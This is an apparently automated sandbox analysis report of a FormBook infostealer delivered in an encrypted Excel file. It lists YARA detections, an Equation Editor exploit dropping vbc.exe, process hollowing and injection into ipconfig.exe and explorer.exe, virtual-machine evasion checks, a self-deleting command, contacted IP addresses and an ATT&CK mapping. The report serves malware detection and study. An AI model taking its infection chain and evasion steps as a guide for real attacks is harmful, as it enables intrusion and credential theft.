          Source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/12@8/6
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403486
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404763 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,4_2_00404763
          Source: C:\Users\Public\vbc.exeCode function: 4_2_722F4225 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,4_2_722F4225
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040216B CoCreateInstance,MultiByteToWideChar,4_2_0040216B
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$QTN3C2AF414EDF9_041873.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBB.tmpJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: QTN3C2AF414EDF9_041873.xlsxVirustotal: Detection: 33%
          Source: QTN3C2AF414EDF9_041873.xlsxReversingLabs: Detection: 25%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: QTN3C2AF414EDF9_041873.xlsxStatic file information: File size 2421248 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: ipconfig.pdb source: vbc.exe, 00000005.00000002.2205835901.00000000004F9000.00000004.00000020.sdmp
          Source: Binary string: ipconfig.pdbN source: vbc.exe, 00000005.00000002.2205835901.00000000004F9000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe
          Source: QTN3C2AF414EDF9_041873.xlsxInitial sample: OLE indicators vbamacros = False
          Source: QTN3C2AF414EDF9_041873.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\Public\vbc.exeUnpacked PE file: 5.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\Public\vbc.exeCode function: 4_2_72E31A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,4_2_72E31A98
          Source: z9ayiyo.dll.4.drStatic PE information: section name: .code
          Source: C:\Users\Public\vbc.exeCode function: 4_2_72E32F60 push eax; ret 4_2_72E32F8E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004160D8 push ebp; ret 5_2_004160E6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C96C push cs; ret 5_2_0041C96D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3B5 push eax; ret 5_2_0041B408
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B46C push eax; ret 5_2_0041B472
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B402 push eax; ret 5_2_0041B408
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B40B push eax; ret 5_2_0041B472
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C40D push esi; iretd 5_2_0041C40F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C485 push FFFFFFC3h; retf 5_2_0041C48D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415CA3 push edx; retf 5_2_00415CB3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CFC1 pushfd ; retf 5_2_0041CFC8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004187D8 push ss; ret 5_2_004187DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DDFA1 push ecx; ret 5_2_008DDFB4
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004160D8 push ebp; ret 5_1_004160E6
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B3B5 push eax; ret 5_1_0041B408
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B46C push eax; ret 5_1_0041B472
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B402 push eax; ret 5_1_0041B408
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B40B push eax; ret 5_1_0041B472
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C40D push esi; iretd 5_1_0041C40F
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C485 push FFFFFFC3h; retf 5_1_0041C48D
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004187D8 push ss; ret 5_1_004187DB
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C96C push cs; ret 5_1_0041C96D
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00415CA3 push edx; retf 5_1_00415CB3
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041CFC1 pushfd ; retf 5_1_0041CFC8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020BDFA1 push ecx; ret 7_2_020BDFB4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000960D8 push ebp; ret 7_2_000960E6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B3B5 push eax; ret 7_2_0009B408
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B40B push eax; ret 7_2_0009B472
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009C40D push esi; iretd 7_2_0009C40F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B402 push eax; ret 7_2_0009B408
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B46C push eax; ret 7_2_0009B472
          Source: initial sampleStatic PE information: section name: .data entropy: 7.7471273442

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\z9ayiyo.dllJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dllJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]Jump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]Jump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: QTN3C2AF414EDF9_041873.xlsxStream path 'EncryptedPackage' entropy: 7.99993012299 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 000000000008897E second address: 0000000000088984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088B0 rdtsc 5_2_004088B0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2792Thread sleep time: -300000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 1616Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405A15
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004065C1 FindFirstFileA,FindClose,4_2_004065C1
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004027A1 FindFirstFileA,4_2_004027A1
          Source: explorer.exe, 00000006.00000000.2168448795.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2183431407.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.2183466751.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000006.00000000.2183431407.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2165759515.000000000058D000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000006.00000000.2168570646.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088B0 rdtsc 5_2_004088B0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B20 LdrLoadDll,5_2_00409B20
          Source: C:\Users\Public\vbc.exeCode function: 4_2_72E31A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,4_2_72E31A98
          Source: C:\Users\Public\vbc.exeCode function: 4_2_722F478F mov eax, dword ptr fs:[00000030h]4_2_722F478F
          Source: C:\Users\Public\vbc.exeCode function: 4_2_722F458C mov eax, dword ptr fs:[00000030h]4_2_722F458C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008C0080 mov ecx, dword ptr fs:[00000030h]5_2_008C0080
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008C00EA mov eax, dword ptr fs:[00000030h]5_2_008C00EA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E26F8 mov eax, dword ptr fs:[00000030h]5_2_008E26F8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C26F8 mov eax, dword ptr fs:[00000030h]7_2_020C26F8
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 103.251.44.218 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 191.96.163.202 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 52.57.196.177 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.61.250 80Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 1388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 1A0000Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
          Source: explorer.exe, 00000006.00000002.2375979053.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000002.2375979053.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2168448795.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.2375979053.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403486

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Spearphishing Link1Native API1Path InterceptionAccess Token Manipulation1Masquerading121OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsProcess Injection512Virtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer15Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Access Token Manipulation1Security Account ManagerProcess Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
